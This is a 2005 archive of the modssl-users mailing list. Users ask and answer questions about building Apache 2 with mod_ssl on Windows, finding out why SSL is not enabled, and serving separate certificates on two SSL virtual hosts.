Delivered-To: modssl-users@modssl.org
Received: from palrel11.hp.com (palrel11.hp.com [156.153.255.246])
	by master.modssl.org (Postfix) with ESMTP id A41A9A8A9D
	for ; Fri, 28 Jan 2005 02:44:39 +0100 (CET)
Received: from cacexg11.americas.cpqcorp.net (cacexg11.americas.cpqcorp.net [16.92.1.67])
	by palrel11.hp.com (Postfix) with ESMTP id 9F249263E8
	for ; Thu, 27 Jan 2005 17:44:18 -0800 (PST)
Received: from cacexc07.americas.cpqcorp.net ([16.92.1.32]) by cacexg11.americas.cpqcorp.net with Microsoft SMTPSVC(6.0.3790.211);
	 Thu, 27 Jan 2005 17:43:49 -0800
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Apache 2 with mod_ssl for windows
Date: Thu, 27 Jan 2005 17:44:40 -0800
Message-ID: <85ECA15B7BB46944BFD4C73AEA55482402017D9C@cacexc07.americas.cpqcorp.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache 2 with mod_ssl for windows
Thread-Index: AcUDz4t1yl37xoORSgOzjk2w3S4g3QAh53pAACAF3TA=
From: "Lange, Bill Charles" 
To: 
X-OriginalArrivalTime: 28 Jan 2005 01:43:49.0546 (UTC) FILETIME=[D06308A0:01C504DA]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lange, Bill Charles" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks for the info.

I was able to get a clean build from the apache and openssl source =
distributions last
night.

The apache site contains the following page which describes pretty well =
how to build the
openssl, and apache with mod_ssl directly from the source if you have =
the microsoft developer
studio.

http://httpd.apache.org/docs-2.0/platform/win_compiling.html

I used developer studio 6 and was able able to get a clean apache build =
with ssl
using openssl 9.7e and the apache 2.0.52 source distribution along with =
the other
tools required for the build, i.e. perl, awk.

Couple minor issues I did run into were:

1) In order for the "mod_deflate" to compile, I had to use the zlib =
1.1.4 source distribution,
not the 1.2.2 which is the "latest" for windows.

2) The instructions for running the perl scripts to build openssl are a =
little unclear.
First you untar the openssl so that the openssl source tree is in the =
srclib/openssl directory.
You must cd into the the srclib/openssl directory, then execute the perl =
scripts as described.

3) On windows you can't execute the command.

perl util\mk1mf.pl dll no-asm no-mdc2 no-rc5 no-idea VC-WIN32 >makefile

It will overwrite the "Makefile" that is previously configured.

You must direct the output to another filename, e.g.
perl util\mk1mf.pl dll no-asm no-mdc2 no-rc5 no-idea VC-WIN32 =
>makefile.rel

then "nmake /f nakefile.rel" for the release build.

Other than this it went pretty well.

There are no pre-build ssl keys or certificates that I could find in the =
source distribution,
so I used the openssl.exe application to create a key and a (self-signed =
certificate) and droped
then add them as the conf/ssl.key/server.key and conf/ssl.crt/server.crt =
files.

Regards,
Bill

-----Original Message-----
From: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org] On Behalf Of R. Markham
Sent: Thursday, January 27, 2005 2:14 AM
To: modssl-users@modssl.org
Subject: AW: Apache 2 with mod_ssl for windows

I did following
1. Install Apache 2.0.52 for windows with out SSL.
2. Unzip Apache 2.0.52 with SSL in C:\programme\apche 3. copy mod_ssl.so =
in c:\programme\apache group\apache\modules 4. Command =
C:\programme\Apache -i - -D SSL  I was wondering there were errors =
coming from in c:\programme\apache group\apache2\conf\ssl.conf

After correcting the error in ssl.conf all is OK.I controlled it with =
openssl s_client -connect url:port

Regards

Richard

-----Urspr=FCngliche Nachricht-----
Von: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org] Im Auftrag von Lange, Bill =
Charles
Gesendet: Mittwoch, 26. Januar 2005 18:51
An: modssl-users@modssl.org
Betreff: Apache 2 with mod_ssl for windows


I've previously build Apache 1.3 for Windows with ssl support using =
mod_ssl so I'm familiar with this process.

I looks like I need to do it for Apache 2 as well because I didn't see =
the mod_ssl module in the windows pre-packaged install and the "no ssl"
at the end of the installer filename was a clue.

It looks like the mod_ssl source module is included with the apache =
source distribution.

I am just looking for any advice before I start building Apach 2 + ssl.
Are there any things to look out for not mentioned in the apache docs =
for instance?
Any references (other then the apache site) that would be helpful for =
building Apache 2 ssl would also be appreciated.

Thanks,
Bill
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 28 08:34:29 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A583DA8A8F; Fri, 28 Jan 2005 08:34:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (mail.gmx.net [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 28686A8974
	for ; Fri, 28 Jan 2005 08:34:24 +0100 (CET)
Received: (qmail 22576 invoked by uid 0); 28 Jan 2005 07:34:06 -0000
Received: from 193.175.238.250 by www32.gmx.net with HTTP;
	Fri, 28 Jan 2005 08:34:07 +0100 (MET)
Date: Fri, 28 Jan 2005 08:34:07 +0100 (MET)
From: "Richard Markham" 
To: modssl-users@modssl.org
MIME-Version: 1.0
References: <85ECA15B7BB46944BFD4C73AEA55482402017D9C@cacexc07.americas.cpqcorp.net>
Subject: RE: Apache 2 with mod_ssl for windows
X-Priority: 3 (Normal)
X-Authenticated: #985284
Message-ID: <13818.1106897647@www32.gmx.net>
X-Mailer: WWW-Mail 1.6 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Richard Markham" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Lucky you!.

I compiled 2.0.47 on my own it was rather cumber i have to download flex,
bison etc.

Compiling openssl was rather straight forward with using the perl script. I
set an environment variable in MS C++ 6.0 IDE. I am sorry I forgot it which
variable I used.

Regard

Richard

> Thanks for the info.
> 
> I was able to get a clean build from the apache and openssl source
> distributions last
> night.
> 
> The apache site contains the following page which describes pretty well
> how to build the
> openssl, and apache with mod_ssl directly from the source if you have the
> microsoft developer
> studio.
> 
> http://httpd.apache.org/docs-2.0/platform/win_compiling.html
> 
> I used developer studio 6 and was able able to get a clean apache build
> with ssl
> using openssl 9.7e and the apache 2.0.52 source distribution along with
> the other
> tools required for the build, i.e. perl, awk.
> 
> Couple minor issues I did run into were:
> 
> 1) In order for the "mod_deflate" to compile, I had to use the zlib 1.1.4
> source distribution,
> not the 1.2.2 which is the "latest" for windows.
> 
> 2) The instructions for running the perl scripts to build openssl are a
> little unclear.
> First you untar the openssl so that the openssl source tree is in the
> srclib/openssl directory.
> You must cd into the the srclib/openssl directory, then execute the perl
> scripts as described.
> 
> 3) On windows you can't execute the command.
> 
> perl util\mk1mf.pl dll no-asm no-mdc2 no-rc5 no-idea VC-WIN32 >makefile
> 
> It will overwrite the "Makefile" that is previously configured.
> 
> You must direct the output to another filename, e.g.
> perl util\mk1mf.pl dll no-asm no-mdc2 no-rc5 no-idea VC-WIN32
> >makefile.rel
> 
> then "nmake /f nakefile.rel" for the release build.
> 
> Other than this it went pretty well.
> 
> There are no pre-build ssl keys or certificates that I could find in the
> source distribution,
> so I used the openssl.exe application to create a key and a (self-signed
> certificate) and droped
> then add them as the conf/ssl.key/server.key and conf/ssl.crt/server.crt
> files.
> 
> Regards,
> Bill
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 31 17:49:53 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 00635A8A4F; Mon, 31 Jan 2005 17:49:52 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rduex02.corp.stratech.com (outmail.stratech.com [216.26.242.2])
	by master.modssl.org (Postfix) with ESMTP id 3DDF2A8948
	for ; Mon, 31 Jan 2005 17:49:47 +0100 (CET)
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C507B4.95DED5A6"
Subject: Is mod_ssl installed
Date: Mon, 31 Jan 2005 11:47:43 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Is mod_ssl installed
thread-index: AcUHtM7I73P5L11MRqKOcwQlkjF6zA==
From: "Plantier, Spencer" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Plantier, Spencer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C507B4.95DED5A6
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

I cant get ssl to work.=20

I did a search on my httpd.conf and it has (IfModule mod_ssl.c)
=20
Include conf/ssl.conf
=20
(/IfModule)
And when I do a httpd -l I get:

Compiled in modules:
  core.c
  mod_access.c
  mod_auth.c
  mod_include.c
  mod_log_config.c
  mod_env.c
  mod_setenvif.c
  prefork.c
  http_core.c
  mod_mime.c
  mod_status.c
  mod_autoindex.c
  mod_asis.c
  mod_cgi.c
  mod_negotiation.c
  mod_dir.c
  mod_imap.c
  mod_actions.c
  mod_userdir.c
  mod_alias.c
  mod_so.c

Spencer Plantier
System Network Administrator
=20
301 Gregson Dr
Cary, NC  27511
Office 919-379-8513
Cell    919-272-8833
spencer.plantier@stratech.com


------_=_NextPart_001_01C507B4.95DED5A6
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






Is mod_ssl installed





I =
cant get ssl to work. 



I did =
a search on my httpd.conf and it has (IfModule =
mod_ssl.c)



         &nbs=
p;            =
;            =
            &=
nbsp;           &n=
bsp;         Include =
conf/ssl.conf



         &nbs=
p;            =
;            =
            &=
nbsp;           &n=
bsp;   (/IfModule)



And =
when I do a httpd l I get:



Compiled in modules:



  core.c



  mod_access.c



  mod_auth.c



  mod_include.c



  mod_log_config.c



  mod_env.c



  mod_setenvif.c



  prefork.c



  http_core.c



  mod_mime.c



  mod_status.c



  mod_autoindex.c



  mod_asis.c



  mod_cgi.c



  mod_negotiation.c



  mod_dir.c



  mod_imap.c



  mod_actions.c



  mod_userdir.c



  mod_alias.c



  mod_so.c



Spencer =
Plantier



System Network Administrator



 



301 =
Gregson Dr



Cary, =
NC  27511



Office 919-379-8513



Cell    919-272-8833



spencer.plantier@stratech.com







------_=_NextPart_001_01C507B4.95DED5A6--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 31 18:00:43 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7B0A4A8A4F; Mon, 31 Jan 2005 18:00:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web30902.mail.mud.yahoo.com (web30902.mail.mud.yahoo.com [68.142.200.155])
	by master.modssl.org (Postfix) with SMTP id 1C90DA8948
	for ; Mon, 31 Jan 2005 18:00:37 +0100 (CET)
Received: (qmail 28581 invoked by uid 60001); 31 Jan 2005 17:00:18 -0000
Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  b=3BlIf5GsoeY58HnGX5wHPsSC8x3T8BnwfnJ+sfVSmkzKa9qeNcajCvTtMwg6W4HGtVX0eCKNDP03R3U3d/6NMQXoxqfxRl7smNsi8MiWZUp6FTVtiSlJjdboJjxQqyZCHrlptaWyJGgV42en/5ppS2FZFKUlMfEyysrGSmCumao=  ;
Message-ID: <20050131170018.28579.qmail@web30902.mail.mud.yahoo.com>
Received: from [67.170.169.231] by web30902.mail.mud.yahoo.com via HTTP; Mon, 31 Jan 2005 09:00:17 PST
Date: Mon, 31 Jan 2005 09:00:17 -0800 (PST)
From: Ed Lazor 
Subject: multiple certs
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1725390617-1107190817=:28564"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ed Lazor 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-1725390617-1107190817=:28564
Content-Type: text/plain; charset=us-ascii

Hi =)
 
My server is displaying one cert for two domains even though I've assigned each domain it's own cert in the httpd.conf file.  Any idea of how to fix this?
 
- Apache 1.3.33
- modssl 2.8.22
- I checked the ssl key and crt files to make sure they have the correct data
- I've restarted the web server httpd process
- I made sure to assign each domain a unique IP
- I searched the mailing list and didn't see that others have run into this problem
- I checked the FAQ
 
Httpd.conf entries for port 443 of the two domains are listed below.
 
Thanks in advance for any help / ideas.
 
-Ed
 
 
VirtualHost 64.69.41.124:443>
        SSLEngine on
        SSLCertificateFile /etc/httpd/conf/ssl.crt/server.discountrpg.crt
        SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.discountrpg.key

        ServerName www.discountrpg.com
        ServerAlias www.discountrpg.com discountrpg.com  rpgdiscount.com www.rpgdiscount.com rpgdiscounts.com www
.rpgdiscounts.com
        ServerAdmin webmaster@discountrpg.com
        DocumentRoot /home/admin/domains/discountrpg.com/private_html
        ScriptAlias /cgi-bin/ /home/admin/domains/discountrpg.com/public_html/cgi-bin/
        UseCanonicalName OFF
        User admin
        Group admin
        CustomLog /var/log/httpd/domains/discountrpg.com.bytes bytes
        CustomLog /var/log/httpd/domains/discountrpg.com.log combined
        ErrorLog /var/log/httpd/domains/discountrpg.com.error.log
        
                Options +Includes -Indexes
                php_admin_flag engine ON
                php_admin_flag safe_mode OFF
                php_admin_value sendmail_path '/usr/sbin/sendmail -t -i -f admin@discountrpg.com'
        
 
        #php_admin_value open_basedir /home/admin/:/tmp/:/var/www/:/usr/local/lib/php/:/etc/virtual/



        SSLEngine on
        SSLCertificateFile /etc/httpd/conf/ssl.crt/server.rpgstore.crt
        SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.rpgstore.key

        ServerName www.rpgstore.com
        ServerAlias www.rpgstore.com rpgstore.com
        ServerAdmin webmaster@rpgstore.com
        DocumentRoot /home/admin/domains/rpgstore.com/private_html
        ScriptAlias /cgi-bin/ /home/admin/domains/rpgstore.com/public_html/cgi-bin/
        UseCanonicalName OFF
        User admin
        Group admin
        CustomLog /var/log/httpd/domains/rpgstore.com.bytes bytes
        CustomLog /var/log/httpd/domains/rpgstore.com.log combined
        ErrorLog /var/log/httpd/domains/rpgstore.com.error.log
        
                Options +Includes -Indexes
                php_admin_flag engine ON
                php_admin_flag safe_mode OFF
                php_admin_value sendmail_path '/usr/sbin/sendmail -t -i -f admin@rpgstore.com'
        
 
        #php_admin_value open_basedir /home/admin/:/tmp/:/var/www/:/usr/local/lib/php/:/etc/virtual/



--0-1725390617-1107190817=:28564
Content-Type: text/html; charset=us-ascii


Hi =)


 


My server is displaying one cert for two domains even though I've assigned each domain it's own cert in the httpd.conf file.  Any idea of how to fix this?


 


- Apache 1.3.33


- modssl 2.8.22


- I checked the ssl key and crt files to make sure they have the correct data


- I've restarted the web server httpd process


- I made sure to assign each domain a unique IP


- I searched the mailing list and didn't see that others have run into this problem


- I checked the FAQ


 


Httpd.conf entries for port 443 of the two domains are listed below.


 


Thanks in advance for any help / ideas.


 


-Ed


 


 


VirtualHost 64.69.41.124:443>


        SSLEngine on
        SSLCertificateFile /etc/httpd/conf/ssl.crt/server.discountrpg.crt
        SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.discountrpg.key



        ServerName www.discountrpg.com
        ServerAlias www.discountrpg.com discountrpg.com  rpgdiscount.com www.rpgdiscount.com rpgdiscounts.com www
.rpgdiscounts.com
        ServerAdmin webmaster@discountrpg.com
        DocumentRoot /home/admin/domains/discountrpg.com/private_html
        ScriptAlias /cgi-bin/ /home/admin/domains/discountrpg.com/public_html/cgi-bin/


        UseCanonicalName OFF


        User admin
        Group admin
        CustomLog /var/log/httpd/domains/discountrpg.com.bytes bytes
        CustomLog /var/log/httpd/domains/discountrpg.com.log combined
        ErrorLog /var/log/httpd/domains/discountrpg.com.error.log


        <Directory /home/admin/domains/discountrpg.com/private_html>
                Options +Includes -Indexes
                php_admin_flag engine ON
                php_admin_flag safe_mode OFF
                php_admin_value sendmail_path '/usr/sbin/sendmail -t -i -f admin@discountrpg.com'
        </Directory>


 


        #php_admin_value open_basedir /home/admin/:/tmp/:/var/www/:/usr/local/lib/php/:/etc/virtual/


</VirtualHost>


<VirtualHost 64.69.41.123:443>


        SSLEngine on
        SSLCertificateFile /etc/httpd/conf/ssl.crt/server.rpgstore.crt
        SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.rpgstore.key



        ServerName www.rpgstore.com
        ServerAlias www.rpgstore.com rpgstore.com
        ServerAdmin webmaster@rpgstore.com
        DocumentRoot /home/admin/domains/rpgstore.com/private_html
        ScriptAlias /cgi-bin/ /home/admin/domains/rpgstore.com/public_html/cgi-bin/


        UseCanonicalName OFF


        User admin
        Group admin
        CustomLog /var/log/httpd/domains/rpgstore.com.bytes bytes
        CustomLog /var/log/httpd/domains/rpgstore.com.log combined
        ErrorLog /var/log/httpd/domains/rpgstore.com.error.log


        <Directory /home/admin/domains/rpgstore.com/private_html>
                Options +Includes -Indexes
                php_admin_flag engine ON
                php_admin_flag safe_mode OFF
                php_admin_value sendmail_path '/usr/sbin/sendmail -t -i -f admin@rpgstore.com'
        </Directory>


 


        #php_admin_value open_basedir /home/admin/:/tmp/:/var/www/:/usr/local/lib/php/:/etc/virtual/


</VirtualHost>

--0-1725390617-1107190817=:28564--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  1 14:04:54 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6B993A8AA1; Tue,  1 Feb 2005 14:04:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rduex02.corp.stratech.com (outmail.stratech.com [216.26.242.2])
	by master.modssl.org (Postfix) with ESMTP id 52FD2A8A97
	for ; Tue,  1 Feb 2005 14:04:48 +0100 (CET)
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C5085E.56ED82A2"
Subject: mod_ssl
Date: Tue, 1 Feb 2005 08:02:52 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: mod_ssl
thread-index: AcUIXpFI0JspcznFSMuigHjBq2Jn9w==
From: "Plantier, Spencer" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Plantier, Spencer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C5085E.56ED82A2
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

I cant get ssl to work.=20

I did a search on my httpd.conf and it has (IfModule mod_ssl.c)
=20
Include conf/ssl.conf
=20
(/IfModule)
And when I do a httpd -l I get:

Compiled in modules:
  core.c
  mod_access.c
  mod_auth.c
  mod_include.c
  mod_log_config.c
  mod_env.c
  mod_setenvif.c
  prefork.c
  http_core.c
  mod_mime.c
  mod_status.c
  mod_autoindex.c
  mod_asis.c
  mod_cgi.c
  mod_negotiation.c
  mod_dir.c
  mod_imap.c
  mod_actions.c
  mod_userdir.c
  mod_alias.c
  mod_so.c


Spencer Plantier
System Network Administrator
=20
301 Gregson Dr
Cary, NC  27511
Office 919-379-8513
Cell    919-272-8833
spencer.plantier@stratech.com


------_=_NextPart_001_01C5085E.56ED82A2
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






mod_ssl





I =
cant get ssl to work. 



I did =
a search on my httpd.conf and it has (IfModule =
mod_ssl.c)



         &nbs=
p;            =
;            =
            &=
nbsp;           &n=
bsp;         Include =
conf/ssl.conf



         &nbs=
p;            =
;            =
            &=
nbsp;           &n=
bsp;   (/IfModule)



And =
when I do a httpd –l I get:



Compiled in modules:



  core.c



  mod_access.c



  mod_auth.c



  mod_include.c



  mod_log_config.c



  mod_env.c



  mod_setenvif.c



  prefork.c



  http_core.c



  mod_mime.c



  mod_status.c



  mod_autoindex.c



  mod_asis.c



  mod_cgi.c



  mod_negotiation.c



  mod_dir.c



  mod_imap.c



  mod_actions.c



  mod_userdir.c



  mod_alias.c



  mod_so.c





Spencer =
Plantier



System Network Administrator



 



301 =
Gregson Dr



Cary, =
NC  27511



Office 919-379-8513



Cell    919-272-8833



spencer.plantier@stratech.com







------_=_NextPart_001_01C5085E.56ED82A2--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  1 14:13:12 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CCEE6A8AA1; Tue,  1 Feb 2005 14:13:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nwc.com (mail.nwc.com [128.230.97.51])
	by master.modssl.org (Postfix) with ESMTP id 0051AA8A97
	for ; Tue,  1 Feb 2005 14:13:07 +0100 (CET)
X-SpamCatcher-Score:  10 [X]
Received: from [129.44.206.83] (account mfratto HELO bitchin)
  by nwc.com (CommuniGate Pro SMTP 4.2.8)
  with ESMTP-TLS id 4137437 for modssl-users@modssl.org; Tue, 01 Feb 2005 08:12:39 -0500
From: "Mike Fratto" 
To: 
Subject: RE: mod_ssl
Date: Tue, 1 Feb 2005 08:12:38 -0500
Message-ID: <000801c5085f$b4875310$0b1f10ac@bitchin>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0009_01C50835.CBB14B10"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.6626
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
In-Reply-To: 
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mike Fratto" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0009_01C50835.CBB14B10
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

What version of Apache and mod_ssl are you using? Are you trying to compile
it in static or are you using DSO? Need more details. 
 
If your unclear about the above, read this for a quick overview (if you
haven't already) http://www.modssl.org/docs/2.8/ssl_overview.html

-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Plantier, Spencer
Sent: Tuesday, February 01, 2005 8:03 AM
To: modssl-users@modssl.org
Subject: mod_ssl



I cant get ssl to work. 

I did a search on my httpd.conf and it has (IfModule mod_ssl.c)

                                                                    Include
conf/ssl.conf

                                                              (/IfModule)

And when I do a httpd -l I get:

Compiled in modules:

  core.c

  mod_access.c

  mod_auth.c

  mod_include.c

  mod_log_config.c

  mod_env.c

  mod_setenvif.c

  prefork.c

  http_core.c

  mod_mime.c

  mod_status.c

  mod_autoindex.c

  mod_asis.c

  mod_cgi.c

  mod_negotiation.c

  mod_dir.c

  mod_imap.c

  mod_actions.c

  mod_userdir.c

  mod_alias.c

  mod_so.c


Spencer Plantier

System Network Administrator

 

301 Gregson Dr

Cary, NC  27511

Office 919-379-8513

Cell    919-272-8833

spencer.plantier@stratech.com




------=_NextPart_000_0009_01C50835.CBB14B10
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable




Message




What=20
version of Apache and mod_ssl are you using? Are you trying to compile =
it in=20
static or are you using DSO? Need more details. 


 


If=20
your unclear about the above, read this for a quick overview (if you =
haven't=20
already) http://www.mods=
sl.org/docs/2.8/ssl_overview.html



-----Original Message-----
From: =
owner-modssl-users@modssl.org=20
[mailto:owner-modssl-users@modssl.org] On Behalf Of Plantier,=20
Spencer
Sent: Tuesday, February 01, 2005 8:03 AM
To: =

modssl-users@modssl.org
Subject: =
mod_ssl




  
I cant =
get ssl to work.=20
  

  
I did a =
search on my=20
  httpd.conf and it has (IfModule mod_ssl.c)

  
          &nbs=
p;            =
;            =
            &=
nbsp;           &n=
bsp;       =20
  Include conf/ssl.conf

  
          &nbs=
p;            =
;            =
            &=
nbsp;           &n=
bsp; =20
  (/IfModule)

  
And =
when I do a httpd=20
  –l I get:

  
Compiled in=20
  modules:

  
 =20
  core.c

  
 =20
  mod_access.c

  
 =20
  mod_auth.c

  
 =20
  mod_include.c

  
 =20
  mod_log_config.c

  
 =20
  mod_env.c

  
 =20
  mod_setenvif.c

  
 =20
  prefork.c

  
 =20
  http_core.c

  
 =20
  mod_mime.c

  
 =20
  mod_status.c

  
 =20
  mod_autoindex.c

  
 =20
  mod_asis.c

  
 =20
  mod_cgi.c

  
 =20
  mod_negotiation.c

  
 =20
  mod_dir.c

  
 =20
  mod_imap.c

  
 =20
  mod_actions.c

  
 =20
  mod_userdir.c

  
 =20
  mod_alias.c

  
 =20
  mod_so.c


  
Spencer Plantier

  
System =
Network=20
  Administrator

  
 

  
301 =
Gregson=20
  Dr

  
Cary, =
NC =20
  27511

  
Office=20
  919-379-8513

  
Cell   =20
  919-272-8833

  
spencer.plantier@stratech.com

  


------=_NextPart_000_0009_01C50835.CBB14B10--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  1 18:44:13 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 618BEA8A9B; Tue,  1 Feb 2005 18:44:13 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id E8B43A8A91
	for ; Tue,  1 Feb 2005 18:44:06 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA11218;
	Tue, 1 Feb 2005 12:48:48 -0500
Date: Tue, 1 Feb 2005 12:48:46 -0500 (EST)
From: "R. DuFresne" 
To: "Plantier, Spencer" 
Cc: modssl-users@modssl.org
Subject: Re: mod_ssl
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hopefully stratech has you on the bench right now so ya get paid to go
back and read the dcs you obviously avoided for a quickie fix here
.

Did you complie with all hte proper settings for ssl?  is this 1.3.x or
2.0.x?  there are differences, slightly in how one enables ssl in each.
Do you have the pre=coreqs in place to implimnet ssl under apache?  with
1.3.x you ned apache, openssl, and the modssl package as well as mm, with
2.0.x I beleive yer only needing apache and openssl.  But, no one replaied
mostlikely to yer earlier post as you include such scant information as to
what the issue is.

Yer not a transplant down here are ya?

Thanks,

Ron DuFresne

On Tue, 1 Feb 2005, Plantier, Spencer wrote:

> I cant get ssl to work. 
> 
> I did a search on my httpd.conf and it has (IfModule mod_ssl.c)
>  
> Include conf/ssl.conf
>  
> (/IfModule)
> And when I do a httpd -l I get:
> 
> Compiled in modules:
>   core.c
>   mod_access.c
>   mod_auth.c
>   mod_include.c
>   mod_log_config.c
>   mod_env.c
>   mod_setenvif.c
>   prefork.c
>   http_core.c
>   mod_mime.c
>   mod_status.c
>   mod_autoindex.c
>   mod_asis.c
>   mod_cgi.c
>   mod_negotiation.c
>   mod_dir.c
>   mod_imap.c
>   mod_actions.c
>   mod_userdir.c
>   mod_alias.c
>   mod_so.c
> 
> 
> Spencer Plantier
> System Network Administrator
>  
> 301 Gregson Dr
